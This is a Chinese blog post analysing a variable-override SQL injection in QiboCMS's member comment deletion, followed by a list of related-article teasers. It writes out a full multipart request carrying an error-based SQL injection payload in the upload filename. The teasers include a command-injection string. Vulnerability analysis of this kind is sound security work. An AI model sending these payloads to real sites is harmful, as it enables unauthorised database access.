齊博CMS變量覆蓋導致sql注入漏洞分析

原創 xyw55 2020-07-04 03:53

齊博CMS變量覆蓋導致sql注入漏洞分析

漏洞具體詳情見http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13

1. 根據阿里文章會員中心評論管理member/comment.php中存在變量cidDB未初始化,所以從此處開始利用對評論批量刪除,抓包查看


2.exp利用全局變量$_FILES的註冊變量控制不嚴,所以需要在request請求中增加一段文件上傳代碼,代碼如下:

Content-Type: multipart/form-data;boundary=---------------------------159592790718612

Content-Length: 296

 

-----------------------------159592790718612

Content-Disposition: form-data; name="file";filename="123.txt"

Content-Type: text/plain

 

test

-----------------------------159592790718612

Content-Disposition: form-data;name="submit"

 

submit

-----------------------------159592790718612—

當利用common.inc.php處理request時,將會註冊$_FILES的變量。覆蓋變量cidDB,

當$cidDB被遍歷查詢是,$value就是filename的值,即注入playload。

從上面可以看到查詢結果並不回顯,用報錯注入或盲注。

最終playload爲Connection: keep-alive

Content-Type: multipart/form-data;boundary=---------------------------298212969230504

Content-Length: 392

 

-----------------------------298212969230504

Content-Disposition: form-data;name="cidDB"; filename="7' and (select 1 from(selectcount(*),concat((select (select (select concat(0x7e,version(),0x7e))) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a)#"

Content-Type: text/plain

 

test

-----------------------------298212969230504—


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

mysql utf8_unicode_ci 與 utf8_general_ci

您可以在這裏檢查和比較這兩種排序規則提供的排序順序: https://collation-charts.org/mysql60/mysql604.utf8_unicode_ci.european.html https://collation

原創 2024-05-24 00:56:30

Buzz庫網絡爬蟲實例:快速爬取百度搜索實時熱點

前言 隨着互聯網的發展,信息獲取已經成爲了人們日常生活和工作中的重要一環。而在信息獲取的過程中,網絡爬蟲作爲一種自動化的數據採集工具,爲我們提供了極大的便利。本文將介紹如何利用PHP編寫一個簡單而高效的網絡爬蟲,實現快速爬取百度搜索的實

原創 2024-05-24 00:08:55

昔日輝煌不再,PHP老矣,尚能飯否?

導語 | 近期 TIOBE 最新指數顯示,PHP 的流行度降至了歷史最低,排在第 17 名,同時,在年度 Stack Overflow 開發者調查報告中,PHP 在開發者中的受歡迎程度已經從之前的約 30% 萎縮至現在的 18%。“P

原創 2024-05-23 23:48:42

上海站丨飛天技術沙龍 Serverless + AI 專場開啓報名!

活動簡介 “飛天技術沙龍——Serverless 技術實踐營”是一場以 Serverless 爲主題的技術活動,通過一個下午的時間增進對 Serverless 技術的理解,快速上手,活動受衆以關注 Serverless 技術的開發者、企業決

原創 2024-05-23 21:13:46

MySQL全文索引源碼剖析之Insert語句執行過程

本文分享自華爲雲社區《MySQL全文索引源碼剖析之Insert語句執行過程》 ,作者:GaussDB 數據庫。 1. 背景介紹 全文索引是信息檢索領域的一種常用的技術手段,用於全文搜索問題,即根據單詞,搜索包含該單詞的文檔,比如在瀏覽器

原創 2024-05-20 10:59:15

記一次有點抽象的滲透經歷

0x01 獲取webshell 在各種信息蒐集中,發現某個ip的端口掛着一個比較老的服務。 首先看到了員工工號和手機號的雙重驗證,也不知道賬號是什麼結構組成的,基本上放棄字典爆破這一條路。於是乎打開之前用燈塔的掃描結果,看看文件泄露是否

原創 2024-05-17 23:16:30

win 環境下 docker 的使用整理

1、下載: https://www.docker.com/products/docker-desktop/   如果電腦分多個盤,建議下載到可用存儲較大的盤,安裝的時候默認安裝到 C 盤,安裝完成後雙擊啓動   如果出現【Docker

原創 2024-05-17 00:25:04

樹莓派真是個讓人慾罷不能的“小妖精”

大晚上不睡覺、枸杞泡起來@我 一個月之前、自從入了樹莓派4b 8g板之後、就無法自拔,上班除了開發業務代碼和搭建內部UI組件庫之外,就是不亦樂乎的學習docker、mysql、mongodb、php、python、frp等,採購了阿里雲E

osc_51airx3z 2024-05-14 00:37:28

記一些CISP-PTE題目解析

0x01 命令執行 直接payload: 127.0.0.1 &whoami,發現可以成功執行whoami命令 然後ls ../ ,發現有個key.php文件 嘗試用cat命令查看發現不行被攔截了。(其實題目過濾了常用的查看文件的命

原創 2024-05-11 23:51:24

雲效 Pipeline as Code 來了!這些場景,用好它效率翻倍!

從可視化編排到支持 YAML 編排 雲效流水線 Flow 是開箱即用的企業級持續集成和持續交付工具,支持豐富的代碼源、構建、自動化測試工具、多種部署類型和部署方式,與阿里雲深度集成,還提供多種企業級特性,助力企業高效完成從開發到上線 CIC

原創 2024-05-11 21:15:05

php 主動關閉連接,並繼續執行後續程序

ob_start(); echo 'hello world'; $size_o = ob_get_length(); header("Content-Length: $size_o"); header('Connection: cl

原創 2024-04-29 00:38:29

php7.4編譯

 wget https://www.php.net/distributions/php-7.4.33.tar.gz  ./configure --prefix=/usr/local/php7.4 --with-openssl --with-

charley158 2024-04-28 23:51:42

三十分鐘入門基礎Go(Java小子版)

前言 Go語言定義 Go(又稱 Golang)是 Google 的 Robert Griesemer,Rob Pike 及 Ken Thompson 開發的一種靜態、強類型、編譯型語言。Go 語言語法與 C 相近,但功能上有:內存安

原創 2024-04-25 23:17:43

WebDriver庫:實現對音頻文件的自動下載與保存

1. 背景介紹 音頻娛樂在當今社會已經成爲了人們日常生活中不可或缺的一部分。從早晨的音樂播放到晚上的電臺節目,音頻內容貫穿了我們的整個生活。隨着互聯網的普及和技術的進步,越來越多的音頻內容通過網絡平臺進行傳播和分享。網易雲音樂作爲中國領

原創 2024-04-22 23:25:04

實操|基於OceanBase打造更穩定的Zabbix監控系統

近日,Zabbix和OceanBase成功完成了兼容認證。Zabbix支持OceanBase作爲後臺數據庫存儲配置數據和歷史數據,並且性能更優於MySQL數據庫。 Zabbix簡略系統拓撲圖: Zabbix Server和Zabbix

Zabbix中國 2024-04-17 22:13:13